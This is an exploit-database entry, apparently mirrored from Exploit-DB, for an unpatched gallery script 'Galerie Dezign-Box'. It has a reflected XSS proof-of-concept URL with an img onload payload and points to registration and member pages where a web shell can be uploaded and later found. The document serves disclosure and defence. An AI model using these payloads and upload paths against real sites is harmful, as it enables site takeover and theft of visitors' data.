Galerie Dezign-Box © France Multi Vulnerability

vendor:

Dezign-Box © France

by:

indoushka

7,5

CVSS

HIGH

XSS and Upload Shell

79,434

CWE

Product Name: Dezign-Box © France

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)

2020

The vulnerability allows an attacker to inject malicious code into the vulnerable application. The attacker can inject malicious code into the vulnerable application by sending a malicious URL to the victim. The malicious URL contains a malicious script which is executed when the victim visits the URL. The attacker can also upload a malicious shell to the vulnerable application by sending a malicious file to the vulnerable application. The malicious file is then executed when the victim visits the vulnerable application.

Mitigation:

Input validation should be used to prevent malicious code from being injected into the application. The application should also be configured to only allow certain file types to be uploaded to the application.

Source

Exploit-DB raw data:

========================================================================================                  
| # Title    : Galerie Dezign-Box © France Multi Vulnerability      
| # Author   : indoushka                                                               
| # email    : indoushka@hotmail.com                                                   
| # Home     : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)                                                                             
| # Web Site : www.iq-ty.com                                                                                                                            
| # Dork     : Script créé par Funewik - Dezign-Box © France                                         
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       
| # Bug      : Multi                                                                     
======================      Exploit By indoushka       =================================
# Exploit  : 
 
 1- XSS
 
 http://server/galerie/nom.php?id=tufgxab0x2r4xybg527w&nom=<img+src=http://server/dt.gif+onload=alert(213771818860)>

 2- Upload Shell
 
 http://server/galerie/membre/register.php (you Can Upload your Evil)
 
 http://server/galerie/membre/membres.php  (you Can Upload your Evil)
 
 http://server/galerie/membre/uploads/     (2 find what you upload)
 
================================   Dz-Ghost Team   ========================================
Greetz : ÓíÏí ÈáÚÈÇÓ + Úíä ÇáÈÑÏ + ÔáÛæã ÇáÚíÏ K10 + K@MEL + Úíä ãáíáÉ + ÊÛäíÝ
-------------------------------------------------------------------------------------------